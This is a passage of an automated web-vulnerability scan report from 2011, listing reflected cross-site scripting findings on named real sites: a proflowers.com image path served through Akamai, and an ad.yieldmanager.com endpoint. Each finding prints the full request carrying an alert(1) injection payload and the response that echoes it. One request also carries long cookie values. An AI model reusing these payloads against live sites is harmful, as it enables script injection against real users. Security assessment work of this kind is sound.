Unable to find /ProvideCommerce/TUL15swthrt_gv09_2_FC_PF9c7cf<img src=a onerror=alert(1)>fc11b4a6f5d

1.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50 was submitted in the REST URL parameter 9. This input was echoed as 5b4b5<img src=a onerror=alert(1)>e71fc12cb50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:54 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20assrt_dmsk11_PF5b4b5<img src=a onerror=alert(1)>e71fc12cb50

1.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3a285<img%20src%3da%20onerror%3dalert(1)>3b6606d8bca was submitted in the REST URL parameter 9. This input was echoed as 3a285<img src=a onerror=alert(1)>3b6606d8bca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF3a285<img%20src%3da%20onerror%3dalert(1)>3b6606d8bca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=300&hei=350 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:52 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_dmsk11_PF3a285<img src=a onerror=alert(1)>3b6606d8bca

1.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4695f<img%20src%3da%20onerror%3dalert(1)>bf298cafba7 was submitted in the REST URL parameter 9. This input was echoed as 4695f<img src=a onerror=alert(1)>bf298cafba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF4695f<img%20src%3da%20onerror%3dalert(1)>bf298cafba7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF4695f<img src=a onerror=alert(1)>bf298cafba7

1.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e was submitted in the REST URL parameter 9. This input was echoed as 4323c<img src=a onerror=alert(1)>4e98c60444e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_sgv09_control_FC_PF4323c<img src=a onerror=alert(1)>4e98c60444e

1.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57 was submitted in the REST URL parameter 9. This input was echoed as ee8b1<img src=a onerror=alert(1)>e4f2ea6dc57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PFee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_sgv09_test_PFee8b1<img src=a onerror=alert(1)>e4f2ea6dc57

1.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7 was submitted in the REST URL parameter 9. This input was echoed as b6d74<img src=a onerror=alert(1)>d87e77dd9b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PFb6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PFb6d74<img src=a onerror=alert(1)>d87e77dd9b7

1.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 66259<img%20src%3da%20onerror%3dalert(1)>99e8ab47db7 was submitted in the REST URL parameter 9. This input was echoed as 66259<img src=a onerror=alert(1)>99e8ab47db7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF66259<img%20src%3da%20onerror%3dalert(1)>99e8ab47db7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30sweetheart_rdtrmp10_PF66259<img src=a onerror=alert(1)>99e8ab47db7

1.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload def66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757 was submitted in the REST URL parameter 9. This input was echoed as def66<img src=a onerror=alert(1)>193b0e5b757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQdef66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:08 GMT
Connection: close

Unable to find /ProvideCommerce/bearwithredbow09_SQdef66<img src=a onerror=alert(1)>193b0e5b757

1.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe was submitted in the REST URL parameter 9. This input was echoed as a9cd3<img src=a onerror=alert(1)>2550109adfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tna9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/holidaychoc07_tna9cd3<img src=a onerror=alert(1)>2550109adfe

1.60. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95cdf"-alert(1)-"14e796c9f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=1333214&95cdf"-alert(1)-"14e796c9f61=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/hubs/hot/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!A!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mP>!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPA!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPD!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#
G!#mPG!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPJ!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#LI8!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#LI9!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#p!r!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL!#p!u!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL"; ih="b!!!!N!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0LZy!!!!#<m,_`!0L[#!!!!$<m8>B"; vuday1=Gf(n`NFd*luBw.^; 
bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!%<lmXb!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!2a*!!!!#<ln<2!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!,<m915!#Ic1!!!!$<lmXc!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MP0!!!!#<jLPe!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-
